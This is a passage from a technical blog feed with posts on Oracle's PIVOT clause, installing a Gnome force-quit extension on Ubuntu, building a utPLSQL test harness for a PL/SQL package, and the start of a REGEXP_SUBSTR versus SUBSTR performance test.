If you think having a list of Doctor Who Actors means that we already have quite enough stars, you can tweak the query so that we name the columns we’re querying in the SELECT clause.
Note that you can only use columns that you’ve defined in the PIVOT clause ( although you don’t have to use all of them) :
select fourth, tenth, war, fugitive
-- Not selecting "first", although it's defined in the PIVOT clause
-- may be useful when developing/debugging
from
(
select
incarnation,
actor
from doctor_who
)
pivot
(
max(actor)
for incarnation in
(
'4th' as fourth,
'10th' as tenth,
'War Doctor' as war,
'Fugitive Doctor' as fugitive,
'1st' as first
)
)
/
FOURTH TENTH WAR FUGITIVE
-------------------- -------------------- -------------------- --------------------
Tom Baker David Tennant John Hurt Jo Martin
Finally, as you’d expect, the PIVOT CLAUSE does not affect the number of rows read to process the query.
For that, we still need a good old fashoined WHERE CLAUSE in the subquery.
On my OCI 19c Free Tier instance, the plan for the above statement is :
If we add a WHERE CLAUSE. however :
select fourth, tenth, war, fugitive
from
(
select
incarnation,
actor
from doctor_who
where incarnation in ('4th', '10th', 'War Doctor', 'Fugitive Doctor', '1st')
)
pivot
(
max(actor)
for incarnation in
(
'4th' as fourth,
'10th' as tenth,
'War Doctor' as war,
'Fugitive Doctor' as fugitive,
'1st' as first
)
)
/
Now that’s done, I can watch the next episode of Dr Who and the Sticky-back Plastic Monster. Unfortunately, I no longer fit behind the sofa.
Installing a Gnome Desktop Extension in Ubuntu
To distract myself from England’s ongoing woes at the Cricket World Cup, I’ve been playing the simple-yet-addictive London Tube Map Memory Game .
Having not taken the tube for a few years now, it’s proving something of a challenge.
It doesn’t help that they’ve added quite a few stations recently.
Another test of my memory occurs on those rare occasions where I want to terminate a frozen window on my Gnome desktop.
There’s an excellent utility called xkill which does the job…and which I can never remember the name of !
Fortunately there is a Gnome Shell Extension which will add an icon to the gnome-panel at the top of the screen so
it’s only a mouse-click away…
Let’s start with a quick look at xkill in action :
Before we go any further, it’s probably a good idea to confirm which versions of Ubuntu and Gnome I currently have running.
For Ubuntu itself :
cat /etc/release Ubuntu 22.04.3 LTS \n \l
…and for Gnome…
gnome-shell --version GNOME Shell 42.9Installing Extensions Manager
One way to manage Gnome Shell Extensions is to install the appropriately named Extension Manager.
To do this, open a Terminal and run :
sudo apt install gnome-shell-extension-manager
Once installed, you should then find Extension Manager in Activities :
Open it and you’ll see
Click the Browse tab to search for extensions
I know that the Extension I want is called Force Quit and the author is megh. Extension Manager can’t find the Extension by it’s name, but it does if we search for the author
Clicking the Install Button and confirming when prompted causes the extension to be installed and activiated.
We can now see it in the Activity Bar :
Let’s give it a try
Well, that’s one less thing to remember.
Back to ignoring the cricket !
Cut-and-Paste-Driven-Development – Using utPLSQL to build a test harness in Oracle.
If you’re working on a Decision Support System (DSS) then sooner or later you’re likely to need to create or change a package which runs as part of a lengthy batch process.
In such cirumstances, it would be useful to have a good old-fashioned test harness to run your code so you can test it’s functionality without having to kick off the entire batch.
Fortunately, utPLSQL is not just useful when it comes to TDD, CI/CD pipelines and the like. It can easily be used for the purpose of creating a simple stand-alone unit test for a single package.
Having used utPLSQL for this purpose quite regularly, I’ve found that my test harnesses tend to follow the same basic pattern.
What follows is a walkthrough of a typical utPLSQL package I might construct for this purpose.
Obviously, it won’t be to everyone’s taste but hopefully, you’ll find something of use in it.
If you’re interested, you can find the code in this Github Repo.
Testing ApproachThe main purpose of these tests is to check that the program being tested produces a set result for a set input.
Each individual test is structured in four sequential phases :
- Setup – setup the input data to use in the test
- Execute – run the test and retrieve the output
- Validate – check that the output matches what we expect
- Teardown – reset the everything back to how it was before we ran the test.
Whilst tables in DSS applications can contain a large number of columns, our test records only need to contain values that are :
- mandatory in the table ( or possibly part of an RI constraint or Unique Key)
- relevant to the test we’re conducting
In terms of the values themselves, they are not usually constrained other than by the definition of the column into which they are being inserted.
Therefore, we may be able to use negative numbers for integer identifiers to avoid clashes with any pre-existing records.
Also there may be nothing to stop us using random strings for VARCHAR2 values. Alternatively, if you’re easily amused, you may craft your test values to follow a theme. Not that I’d ever do anything so frivolous…
The database I’m running on is Oracle 19c on Oracle Cloud (Free Tier).
The version of utPLSQL used here is 3.1.13, downloaded from the Project’s Github Repo
It was installed without the DDL trigger by connecting to my OCI instance as the Admin user and following the appropriate instructions here.
The Code we’ll be TestingThe package we want to test performs updates on this table :
drop table employees_core;
create table employees_core
(
-- Columns populated by initial load
load_id number not null,
employee_id number not null,
first_name varchar2(20),
last_name varchar2(25),
email varchar2(25),
phone_number varchar2(20),
hire_date date,
job_id varchar2(10),
salary number,
commission_pct number,
manager_id number,
department_id number,
-- Additional columns populated as part of enrichment process
-- Job details
job_title varchar2(50),
-- Department Details
department_name varchar2(50),
-- Enrichment status
record_status varchar2(25),
constraint employees_core_pk primary key (load_id, employee_id)
)
/
To do so, it queries these tables :
create table departments
(
department_id number not null,
department_name varchar2(30) not null,
manager_id number,
location_id number,
constraint departments_pk primary key ( department_id)
)
/
create table jobs
(
JOB_ID varchar2(10) not null,
JOB_TITLE varchar2(35) not null,
MIN_SALARY number,
MAX_SALARY number,
constraint jobs_pk primary key( job_id)
)
/
The package itself is :
create or replace package enrich_employees
is
procedure department_details( i_load_id in number);
procedure job_details( i_load_id in number);
end;
/
create or replace package body enrich_employees
is
procedure department_details( i_load_id in number)
is
-- Populate the Department Name.
-- Suspend the record if we don't get a match.
begin
merge into employees_core emp
using departments dept
on
(
emp.department_id = dept.department_id
and emp.load_id = i_load_id
and emp.record_status = 'PROCESS'
)
when matched then update
set emp.department_name = dept.department_name;
update employees_core
set record_status = 'DEPARTMENT_ID_NOT_FOUND'
where record_status = 'PROCESS'
and department_name is null;
commit;
end department_details;
procedure job_details( i_load_id in number)
is
-- Don't suspend if we don't get a match, just leave the job_title empty.
begin
merge into employees_core emp
using jobs j
on
(
emp.job_id = j.job_id
and emp.record_status = 'PROCESS'
and emp.load_id = i_load_id
)
when matched then update
set emp.job_title = j.job_title;
commit;
end job_details;
end;
/
Note that, as is common in such routines, commits are done immediately after potentially large DML statements in order to minimise the length of time that Undo space is in use.
This is significant as we’ll need to account for it explicitly in our tests.
For the DEPARTMENT_DETAILS procedure, we want to check what happens when :
- we find a match in the DEPARTMENTS table
- we don’t find a match
- the DEPARTMENT_ID on the core record is null
For JOB_DETAILS, the conditions to test are similar :
- RECORD_STATUS is not ‘PROCESS’
- we find a match in the JOBS table
- we don’t find a match
- the JOB_ID is null
From this list of scenarios, we can construct our test package specification :
create or replace package enrich_employees_ut
as
--%suite(enrich_employees_ut)
--%rollback(Manual)
--%test( Department Lookup Succeeds)
procedure department_is_found;
--%test( Department does not exist)
procedure department_not_found;
--%test( Department ID is null)
procedure department_is_null;
--%test( Status is not PROCESS)
procedure status_not_process;
--%test( Job Lookup Succeeds)
procedure job_is_found;
--%test( Job does not exist)
procedure job_not_found;
--%test( Job ID is null)
procedure job_is_null;
end enrich_employees_ut;
The annotations we’re using here are :
--%suite(enrich_employees_ut)
…which allows us to the option to group multiple test packages into the same suite should we want to.
--%rollback(Manual)
…which prevents the Framework attempting it’s default rollback behaviour ( rollback to a savepoint) which won’t work here due to the commits in the code we’re testing.
--%test
…which identifies and describes the tests themselves.
Creating a Stub for the test Package BodyWe may well want to write tests and run them one-at-a-time so that we can adjust them ( or, indeed the code we’re testing) as we go.
In such circumstances, a script such as this, which uses the already created test package specification to generate a file containing the ddl for the package body, might come in handy :
clear screen
set heading off
set lines 130
set pages 500
set feedback off
set verify off
column pkg new_value v_package_name noprint
select '&1' as pkg from dual;
spool '&v_package_name..pkb'
with package_skeleton as
(
select 1 as line, 'create or replace package body &v_package_name' as text from dual
union
select line,
case
when line < ( select max(line) from user_source where name = upper('&v_package_name') and type = 'PACKAGE')
then
replace (
replace(
replace(text, '%test('),
')')
,';', q'[ is begin ut.fail('Not yet written'); end;]')
else text
end as text
from user_source
where name = upper('&v_package_name')
and type = 'PACKAGE'
and line > 1
and
(
regexp_replace(text, '[[:space:]]') not like '--\%%' escape '\'
or
regexp_replace(text, '[[:space:]]') like '--\%test%' escape '\'
)
)
select text from package_skeleton order by line
/
In this case, the generated package body looks like this, and compiles straight away :
create or replace package body enrich_employees_ut
as
-- Department Lookup Succeeds
procedure department_is_found is begin ut.fail('Not yet written'); end;
-- Department does not exist
procedure department_not_found is begin ut.fail('Not yet written'); end;
-- Department ID is null
procedure department_is_null is begin ut.fail('Not yet written'); end;
-- Status is not PROCESS
procedure status_not_process is begin ut.fail('Not yet written'); end;
-- Job Lookup Succeeds
procedure job_is_found is begin ut.fail('Not yet written'); end;
-- Job does not exist
procedure job_not_found is begin ut.fail('Not yet written'); end;
-- Job ID is null
procedure job_is_null is begin ut.fail('Not yet written'); end;
end enrich_employees_ut;
I prefer to create global variables to hold the test data.
This is because each test is likely to use a similar data set so, this way, the variables only need to be declared once.
As we’re dealing with table rows here, I’m just declaring a single record variable for each table.
This makes it very simple to add columns that we want to populate as they’re pre-declared as part of the record type.
For this test, my globals are :
g_emp employees_core%rowtype; g_job jobs%rowtype; g_dept departments%rowtype; g_result employees_core%rowtype;
Next, we need a procedure to initialise these globals :
procedure set_globals
is
begin
-- start by setting the globals to the values required for the first test, which
-- I usually make the test for the most commonly expected behaviour
--
-- Values for Employees Core record
--
-- Making numeric values negative means that they are less likely to clash
-- with an existing sequence generated value
g_emp.load_id := -1;
g_emp.employee_id := -8;
-- However wide the table, we only have to populate mandatory columns, and
-- any columns we want for the tests...
g_emp.department_id := -64;
g_emp.record_status := 'PROCESS';
-- Job Id is a Varchar - no constraints on it other than length...
g_emp.job_id := 'WIZZARD';
--
-- Values for the Department Lookup ( starting with ones that we expect to find)
--
-- Values set independently of the EMPLOYEES_CORE values as we'll want to see what happens
-- if they DON't match, as well as if they do.
g_dept.department_id := -64;
g_dept.department_name := 'Cruel and Unusual Geography';
--
-- Values for the Job lookup
--
g_job.job_id := 'WIZZARD';
g_job.job_title := 'Professor';
end set_globals;
Then there is a procedure to create the test records using the global variable values.
This separation between initialising the globals and creating the records is needed so that we can “tweak” the values we use for each test as appropriate :
procedure setup_data
is
-- Populate the tables with our test data
begin
insert into employees_core values g_emp;
insert into departments values g_dept;
insert into jobs values g_job;
commit;
end setup_data;
This is followed by a procedure to retrieve the actual results of the program execution :
procedure fetch_results
is
cursor c_result is
select *
from employees_core
where load_id = g_emp.load_id
and employee_id = g_emp.employee_id;
begin
open c_result;
fetch c_result into g_result;
close c_result;
end fetch_results;
Finally, as we need to tidy up after we’ve finished, there’s a teardown procedure to remove any test records we’ve set up :
procedure teardown_data
is
-- Tidy up by removing the test data using unique values where possible.
begin
delete from employees_core
where employee_id = g_emp.employee_id
and load_id = g_emp.load_id;
delete from departments
where department_id = g_dept.department_id;
delete from jobs
where job_id = g_job.job_id;
commit;
end teardown_data;
You might think we’ve done quite a bit of typing without writing any tests. The payoff for this up-front effort becomes apparent when you start on the first test, as you’re pretty much just calling everything you’ve already written and only need to add a couple of expectations, and an exception handler :
-- Department Lookup Succeeds
procedure department_is_found
is
begin
-- Setup
set_globals;
setup_data;
-- Execute
enrich_employees.department_details(g_emp.load_id);
-- Get the actual results
fetch_results;
-- Validate
ut.expect( g_result.department_name).to_(equal(g_dept.department_name));
ut.expect( g_result.record_status).to_(equal('PROCESS'));
-- Teardown
teardown_data;
exception when others then
dbms_output.put_line(dbms_utility.format_error_stack);
ut.fail('Unexpected Error');
teardown_data;
end;
The exception handler is there to ensure that the teardown runs even if we hit an unexpected error.
This is more likely than usual as you’re developing the test code and (potentially) the code your testing iteratively when running these tests.
We can execute our test standalone :
set serverout on exec ut.run('enrich_employees_ut.department_is_found'); enrich_employees_ut Department Lookup Succeeds [.005 sec] Finished in .007019 seconds 1 tests, 0 failed, 0 errored, 0 disabled, 0 warning(s) PL/SQL procedure successfully completed.
The code for our second test is almost identical, apart from the change in one variable value and the expected results :
-- Department does not exist
procedure department_not_found
is
begin
-- Setup
set_globals;
-- Almost exactly the same as the first test excep...
g_emp.department_id := -4096;
setup_data;
-- Execute
enrich_employees.department_details(g_emp.load_id);
fetch_results;
-- Validate
ut.expect( g_result.department_name).to_(be_null());
ut.expect( g_result.record_status).to_(equal('DEPARTMENT_ID_NOT_FOUND'));
-- Teardown
teardown_data;
exception when others then
dbms_output.put_line(dbms_utility.format_error_stack);
ut.fail('Unexpected Error');
teardown_data;
end;
The rest of the test follow a broadly similar pattern.
The finished test package body looks like this :
create or replace package body enrich_employees_ut
as
-- Global variables for use in tests
g_emp employees_core%rowtype;
g_job jobs%rowtype;
g_dept departments%rowtype;
g_result employees_core%rowtype;
procedure set_globals
is
begin
g_emp.load_id := -1;
g_emp.employee_id := -8;
g_emp.department_id := -64;
g_emp.record_status := 'PROCESS';
g_emp.job_id := 'WIZZARD';
g_dept.department_id := -64;
g_dept.department_name := 'Cruel and Unusual Geography';
g_job.job_id := 'WIZZARD';
g_job.job_title := 'Professor';
end set_globals;
procedure setup_data
is
begin
insert into employees_core values g_emp;
insert into departments values g_dept;
insert into jobs values g_job;
commit;
end setup_data;
procedure fetch_results
is
cursor c_result is
select *
from employees_core
where load_id = g_emp.load_id
and employee_id = g_emp.employee_id;
begin
open c_result;
fetch c_result into g_result;
close c_result;
end fetch_results;
procedure teardown_data
is
-- Tidy up by removing the test data using unique values where possible.
begin
delete from employees_core
where employee_id = g_emp.employee_id
and load_id = g_emp.load_id;
delete from departments
where department_id = g_dept.department_id;
delete from jobs
where job_id = g_job.job_id;
commit;
end teardown_data;
-- Department Lookup Succeeds
procedure department_is_found
is
begin
-- Setup
set_globals;
setup_data;
-- Execute
enrich_employees.department_details(g_emp.load_id);
fetch_results;
-- Validate
ut.expect( g_result.department_name).to_(equal(g_dept.department_name));
ut.expect( g_result.record_status).to_(equal('PROCESS'));
-- Teardown
teardown_data;
exception when others then
dbms_output.put_line(dbms_utility.format_error_stack);
ut.fail('Unexpected Error');
teardown_data;
end;
-- Department does not exist
procedure department_not_found
is
begin
-- Setup
set_globals;
-- Almost exactly the same as the first test excep...
g_emp.department_id := -4096;
setup_data;
-- Execute
enrich_employees.department_details(g_emp.load_id);
fetch_results;
-- Validate
ut.expect( g_result.department_name).to_(be_null());
ut.expect( g_result.record_status).to_(equal('DEPARTMENT_ID_NOT_FOUND'));
-- Teardown
teardown_data;
exception when others then
dbms_output.put_line(dbms_utility.format_error_stack);
ut.fail('Unexpected Error');
teardown_data;
end;
-- Department ID is null
procedure department_is_null
is
begin
-- Setup
set_globals;
-- Again, just a single change required :
g_emp.department_id := null;
setup_data;
-- Execute
enrich_employees.department_details(g_emp.load_id);
fetch_results;
-- Validate
ut.expect( g_result.department_name).to_(be_null());
ut.expect( g_result.record_status).to_(equal('DEPARTMENT_ID_NOT_FOUND'));
-- Teardown
teardown_data;
exception when others then
dbms_output.put_line(dbms_utility.format_error_stack);
ut.fail('Unexpected Error');
teardown_data;
end;
-- Status is not PROCESS
procedure status_not_process
is
begin
-- Setup
set_globals;
-- This time set the status to prevent processing
g_emp.record_status := 'SUSPENDED';
setup_data;
-- Execute
enrich_employees.department_details(g_emp.load_id);
fetch_results;
-- Validate
ut.expect( g_result.department_name).to_(be_null());
ut.expect( g_result.record_status).to_(equal('SUSPENDED'));
-- Teardown
teardown_data;
exception when others then
dbms_output.put_line(dbms_utility.format_error_stack);
ut.fail('Unexpected Error');
teardown_data;
end;
-- JOB Lookup Succeeds
procedure job_is_found
is
begin
-- Setup
-- We can use the default values here
set_globals;
setup_data;
-- Execute
enrich_employees.job_details(g_emp.load_id);
fetch_results;
-- Validate
ut.expect( g_result.job_title).to_(equal(g_job.job_title));
-- Teardown
teardown_data;
exception when others then
dbms_output.put_line(dbms_utility.format_error_stack);
ut.fail('Unexpected Error');
teardown_data;
end;
-- Job does not exist
procedure job_not_found
is
begin
-- Setup
set_globals;
g_emp.job_id := -32768;
setup_data;
-- Execute
enrich_employees.job_details(g_emp.load_id);
-- Get the actual results
fetch_results;
-- Validate
ut.expect( g_result.job_title).to_(be_null());
ut.expect( g_result.record_status).to_(equal('PROCESS'));
-- Teardown
teardown_data;
exception when others then
dbms_output.put_line(dbms_utility.format_error_stack);
ut.fail('Unexpected Error');
teardown_data;
end;
-- Job ID is null
procedure job_is_null
is
begin
-- Setup
set_globals;
g_emp.job_id := null;
setup_data;
-- Execute
enrich_employees.job_details(g_emp.load_id);
fetch_results;
-- Validate
ut.expect( g_result.job_title).to_(be_null());
ut.expect( g_result.record_status).to_(equal('PROCESS'));
-- Teardown
teardown_data;
exception when others then
dbms_output.put_line(dbms_utility.format_error_stack);
ut.fail('Unexpected Error');
teardown_data;
end;
end enrich_employees_ut;
To run all of the tests in a suite, I usually use a script like this, which handles recompilation of either the test package or the code unit being tested without raising all those pesky ORA-4068 errors :
exec dbms_session.modify_package_state(dbms_session.reinitialize); clear screen set serveroutput on size unlimited exec ut.run('enrich_employees_ut'); enrich_employees_ut Department Lookup Succeeds [.004 sec] Department does not exist [.003 sec] Department ID is null [.003 sec] Status is not PROCESS [.003 sec] Job Lookup Succeeds [.003 sec] Job does not exist [.003 sec] Job ID is null [.003 sec] Finished in .026568 seconds 7 tests, 0 failed, 0 errored, 0 disabled, 0 warning(s) PL/SQL procedure successfully completed.
Of course I will probably still need to run a batch at some point if I want to perform a full System Test and (optionally) a load test. For now however, I can be confident that my code is at least functionally correct.
A Performance Comparison between Oracle’s REGEXP_SUBSTR and SUBSTR functions
Oracle SQL offers support for POSIX regular expressions by means of a suite of native functions.
“Regular Expressions are a pathway to many abilities that some consider…unnatural.“Whilst providing the ability for complex search conditions that regular expressions offer, REGEXP_SUBSTR has acquired a reputation for being a fair bit slower when compared to the standard SUBSTR function.
What I’m going to demonstrate here is :
- how SUBSTR seems generally to be faster than REGEXP_SUBSTR
- how the performance of REGEXP_SUBSTR can improve dramatically when used with INSTR
- REGEXP_SUBSTR performs better when it matches the start of a string
To start with though, well discover why you’ll never see a Sith Lord on Sesame Street ( hint : it’s the way they count in a Galaxy Far, Far Away)…
A Test TableWe have a two-column table that looks like this :
create table star_wars_numbers
(
id number generated always as identity,
episode varchar2(4000)
)
/
insert into star_wars_numbers( episode)
values('Four');
insert into star_wars_numbers( episode)
values('Four|Five');
insert into star_wars_numbers( episode)
values('Four|Five|Six');
insert into star_wars_numbers( episode)
values('Four|Five|Six|One');
insert into star_wars_numbers( episode)
values('Four|Five|Six|One|Two');
insert into star_wars_numbers( episode)
values('Four|Five|Six|One|Two|Three');
insert into star_wars_numbers( episode)
values('Four|Five|Six|One|Two|Three|Seven');
insert into star_wars_numbers( episode)
values('Four|Five|Six|One|Two|Three|Seven|Three-and-a-bit');
insert into star_wars_numbers( episode)
values('Four|Five|Six|One|Two|Three|Seven|Three-and-a-bit|Three and a bit less of a bit');
insert into star_wars_numbers( episode)
values('Four|Five|Six|One|Two|Three|Seven|Three-and-a-bit|Three and a bit less of a bit|Eight');
insert into star_wars_numbers( episode)
values('Four|Five|Six|One|Two|Three|Seven|Three-and-a-bit|Three and a bit less of a bit|Eight|Nine');
commit;
Whilst the contents of the EPISODES column may be the result of arcane Sith ritual, Moof-Milker activity in the design process cannot be ruled out.
Either way, the EPISODES column contains up to 11 values, with multiple columns being separated by a ‘|’.
Extracting each value in SQLUsing SUBSTR and INSTR to separate out the values in EPISODES is, as ever, quite a bit of typing…
select
id,
episode,
substr
(
episode,
1,
case
when instr(episode, '|') > 0 then instr(episode, '|') -1
else length(episode)
end
) as "A New Hope",
case when instr(episode, '|', 1, 1) > 0 then
substr
(
episode,
instr(episode, '|', 1, 1) + 1, -- start
case
when instr(episode, '|', 1, 2) > 0 then instr(episode, '|', 1,2) -1
else length(episode)
end
-
instr(episode, '|', 1, 1)
)
end as "The Empire Strikes Back",
case when instr(episode, '|', 1, 2) > 0 then
substr( episode, instr(episode, '|', 1, 2) + 1,
case when instr(episode, '|', 1,3) > 0 then instr(episode, '|',1,3) - 1 else length(episode) end
-
instr(episode, '|', 1, 2))
end as "Return of the Jedi",
case when instr(episode, '|', 1, 3) > 0 then
substr( episode, instr(episode, '|', 1, 3) + 1,
case when instr(episode, '|', 1,4) > 0 then instr(episode, '|',1,4) - 1 else length(episode) end
-
instr(episode, '|', 1, 3))
end as "Phantom Menace",
case when instr(episode, '|', 1, 4) > 0 then
substr( episode, instr(episode, '|', 1, 4) + 1,
case when instr(episode, '|', 1,5) > 0 then instr(episode, '|',1,5) - 1 else length(episode) end
-
instr(episode, '|', 1, 4))
end as "Attack of the Clones",
case when instr(episode, '|', 1, 5) > 0 then
substr( episode, instr(episode, '|', 1, 5) + 1,
case when instr(episode, '|', 1,6) > 0 then instr(episode, '|',1,6) - 1 else length(episode) end
-
instr(episode, '|', 1, 5))
end as "Revenge of the Sith",
case when instr(episode, '|', 1, 6) > 0 then
substr( episode, instr(episode, '|', 1, 6) + 1,
case when instr(episode, '|', 1,7) > 0 then instr(episode, '|',1,7) - 1 else length(episode) end
-
instr(episode, '|', 1, 6))
end as "The Force Awakens",
case when instr(episode, '|', 1, 7) > 0 then
substr( episode, instr(episode, '|', 1, 7) + 1,
case when instr(episode, '|', 1,8) > 0 then instr(episode, '|',1,8) - 1 else length(episode) end
-
instr(episode, '|', 1, 7))
end as "Rogue One",
case when instr(episode, '|', 1, 8) > 0 then
substr( episode, instr(episode, '|', 1, 8) + 1,
case when instr(episode, '|', 1,9) > 0 then instr(episode, '|',1,9) - 1 else length(episode) end
-
instr(episode, '|', 1, 8))
end as "Solo",
case when instr(episode, '|', 1, 9) > 0 then
substr( episode, instr(episode, '|', 1, 9) + 1,
case when instr(episode, '|', 1, 10) > 0 then instr(episode, '|',1, 10) - 1 else length(episode) end
-
instr(episode, '|', 1, 9))
end as "The Last Jedi",
case when instr(episode, '|', 1, 10) > 0 then
substr( episode, instr(episode, '|', 1, 10) + 1,
case when instr(episode, '|', 1, 11) > 0 then instr(episode, '|',1, 11) - 1 else length(episode) end
-
instr(episode, '|', 1, 10))
end as "The Rise of Skywalker"
from star_wars_numbers
/
…although these days ( version 12c and later), we can save ourselves a bit of effort by using an inline function…
with function extract_episode( i_string in varchar2, i_pos in pls_integer)
return varchar2
is
begin
if i_pos = 1 then
return substr(i_string, 1, case when instr(i_string, '|') > 0 then instr(i_string, '|') - 1 else length(i_string) end);
end if;
return
case when instr(i_string, '|', 1, i_pos -1 ) > 0 then
substr( i_string, instr(i_string, '|', 1, i_pos -1) + 1,
case when instr(i_string, '|', 1, i_pos) > 0 then instr(i_string, '|',1, i_pos) - 1 else length(i_string) end
-
instr( i_string, '|', 1, i_pos - 1))
end;
end;
select
id, episode,
extract_episode( episode, 1) as "A New Hope",
extract_episode( episode, 2) as "Empire Strikes Back",
extract_episode( episode, 3) as "Return of the Jedi",
extract_episode( episode, 4) as "The Phantom Menace",
extract_episode( episode, 5) as "Attack of the Clones",
extract_episode( episode, 6) as "Revenge of the Sith",
extract_episode( episode, 7) as "The Force Awakens",
extract_episode( episode, 8) as "Rogue One",
extract_episode( episode, 9) as "Solo",
extract_episode( episode, 10) as "The Last Jedi",
extract_episode( episode, 11) as "The Rise of Skywalker"
from star_wars_numbers
/
Whether you find the equivalent regexp query more elegant or just horrible is somewhat subjective :
select
regexp_substr(episode, '[^|]+') as "A New Hope",
regexp_substr(episode, '[^|]+',1, 2) as "The Empire Strikes Back",
regexp_substr(episode, '[^|]+',1, 3) as "Return of the Jedi",
regexp_substr(episode, '[^|]+',1, 4) as "The Phantom Menace",
regexp_substr(episode, '[^|]+',1, 5) as "Attack of the Clones",
regexp_substr(episode, '[^|]+',1, 6) as "Revenge of the Sith",
regexp_substr(episode, '[^|]+',1, 7) as "The Force Awakens",
regexp_substr(episode, '[^|]+',1, 8) as "Rogue One",
regexp_substr(episode, '[^|]+',1, 9) as "Solo",
regexp_substr(episode, '[^|]+',1, 10) as "The Last Jedi",
regexp_substr(episode, '[^|]+',1, 11) as "The Rise of Skywalker"
from star_wars_numbers
/
Irrespective of aesthetic considerations, I should explain the regexp in use here, if only so I can understand it when I read this a few months from now :
[^|] - match any character that isn't pipe ("|") + - match one or more times
Next, we need to find out how the regexp function stacks up when it comes to performance, and we’re not going to find that with a mere 11 rows of data…
Performance Test SetupLet’s make some use of all that space in the Galaxy Far, Far Away…
create table galaxy (
id number generated always as identity,
episode varchar2(4000))
/
begin
for i in 1..100000 loop
insert into galaxy(episode)
select episode from star_wars_numbers;
commit;
end loop;
end;
/
exec dbms_stats.gather_table_stats(user, 'galaxy');
All of the following tests were run on Oracle 19c Enterprise Edition running on Oracle Linux.
Everything was run in a SQL*Plus session from the command line on the database server.
The queries were run in SQL*Plus with the following settings :
set lines 130 clear screen set autotrace trace set timing on
Each query was executed at least twice consecutively to ensure that results were not skewed by the state of the buffer cache.
It’s also worth noting that, I found no low-level explanation for the performance discrepancies between the two functions when trawling through trace files. Therefore, I’ve concentrated on elapsed time as the main performance metric in these tests.
Test 1 – All Fields extracted in the Select ClauseLet’s start with the SUBSTR function ( referred to as “Standard” henceforth) :
select
id,
substr
(
episode, -- input string
1, -- start position
case
when instr(episode, '|') > 0 then instr(episode, '|') -1
else length(episode)
end -- number of characters to extract
) as "A New Hope",
case when instr(episode, '|', 1, 1) > 0 then
substr
(
episode,
instr(episode, '|', 1, 1) + 1, -- start
case
when instr(episode, '|', 1, 2) > 0 then instr(episode, '|', 1,2) -1
else length(episode)
end
-
instr(episode, '|', 1, 1)
)
end as "The Empire Strikes Back",
case when instr(episode, '|', 1, 2) > 0 then
substr( episode, instr(episode, '|', 1, 2) + 1,
case when instr(episode, '|', 1,3) > 0 then instr(episode, '|',1,3) - 1 else length(episode) end
-
instr(episode, '|', 1, 2))
end as "Return of the Jedi",
case when instr(episode, '|', 1, 3) > 0 then
substr( episode, instr(episode, '|', 1, 3) + 1,
case when instr(episode, '|', 1,4) > 0 then instr(episode, '|',1,4) - 1 else length(episode) end
-
instr(episode, '|', 1, 3))
end as "Phantom Menace",
case when instr(episode, '|', 1, 4) > 0 then
substr( episode, instr(episode, '|', 1, 4) + 1,
case when instr(episode, '|', 1,5) > 0 then instr(episode, '|',1,5) - 1 else length(episode) end
-
instr(episode, '|', 1, 4))
end as "Attack of the Clones",
case when instr(episode, '|', 1, 5) > 0 then
substr( episode, instr(episode, '|', 1, 5) + 1,
case when instr(episode, '|', 1,6) > 0 then instr(episode, '|',1,6) - 1 else length(episode) end
-
instr(episode, '|', 1, 5))
end as "Revenge of the Sith",
case when instr(episode, '|', 1, 6) > 0 then
substr( episode, instr(episode, '|', 1, 6) + 1,
case when instr(episode, '|', 1,7) > 0 then instr(episode, '|',1,7) - 1 else length(episode) end
-
instr(episode, '|', 1, 6))
end as "The Force Awakens",
case when instr(episode, '|', 1, 7) > 0 then
substr( episode, instr(episode, '|', 1, 7) + 1,
case when instr(episode, '|', 1,8) > 0 then instr(episode, '|',1,8) - 1 else length(episode) end
-
instr(episode, '|', 1, 7))
end as "Rogue One",
case when instr(episode, '|', 1, 8) > 0 then
substr( episode, instr(episode, '|', 1, 8) + 1,
case when instr(episode, '|', 1,9) > 0 then instr(episode, '|',1,9) - 1 else length(episode) end
-
instr(episode, '|', 1, 8))
end as "Solo",
case when instr(episode, '|', 1, 9) > 0 then
substr( episode, instr(episode, '|', 1, 9) + 1,
case when instr(episode, '|', 1, 10) > 0 then instr(episode, '|',1, 10) - 1 else length(episode) end
-
instr(episode, '|', 1, 9))
end as "The Last Jedi",
case when instr(episode, '|', 1, 10) > 0 then
substr( episode, instr(episode, '|', 1, 10) + 1,
case when instr(episode, '|', 1, 11) > 0 then instr(episode, '|',1, 11) - 1 else length(episode) end
-
instr(episode, '|', 1, 10))
end as "The Rise of Skywalker"
from galaxy
/
Runnnig this query, we get :
1100000 rows selected. Elapsed: 00:00:20.32 Execution Plan ---------------------------------------------------------- Plan hash value: 3574103611 ---------------------------------------------------------------------------- | Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time | ---------------------------------------------------------------------------- | 0 | SELECT STATEMENT | | 1100K| 47M| 2089 (1)| 00:00:01 | | 1 | TABLE ACCESS FULL| GALAXY | 1100K| 47M| 2089 (1)| 00:00:01 | ---------------------------------------------------------------------------- Statistics ---------------------------------------------------------- 0 recursive calls 0 db block gets 80459 consistent gets 7616 physical reads 0 redo size 35857676 bytes sent via SQL*Net to client 811886 bytes received via SQL*Net from client 73335 SQL*Net roundtrips to/from client 0 sorts (memory) 0 sorts (disk) 1100000 rows processed
Before we look at the REGEXP_SUBSTR equivalent, it’s probably worth considering the more streamlined in-line function version of this query :
with function extract_episode( i_string in varchar2, i_pos in pls_integer)
return varchar2
is
begin
return
case when instr(i_string, '|', 1, i_pos -1 ) > 0 then
substr( i_string, instr(i_string, '|', 1, i_pos -1) + 1,
case when instr(i_string, '|', 1, i_pos) > 0 then instr(i_string, '|',1, i_pos) - 1 else length(i_string) end
-
instr( i_string, '|', 1, i_pos - 1))
end;
end;
select
id,
substr
(
episode,
1,
case
when instr(episode, '|') > 0 then instr(episode, '|') -1
else length(episode)
end
) as "A New Hope",
extract_episode( episode, 2) as "Empire Strikes Back",
extract_episode( episode, 3) as "Return of the Jedi",
extract_episode( episode, 4) as "The Phantom Menace",
extract_episode( episode, 5) as "Attack of the Clones",
extract_episode( episode, 6) as "Revenge of the Sith",
extract_episode( episode, 7) as "The Force Awakens",
extract_episode( episode, 8) as "Rogue One",
extract_episode( episode, 9) as "Solo",
extract_episode( episode, 10) as "The Last Jedi",
extract_episode( episode, 11) as "The Rise of Skywalker"
from galaxy
/
Whilst it’s a bit more readable, it’s also a lot slower :
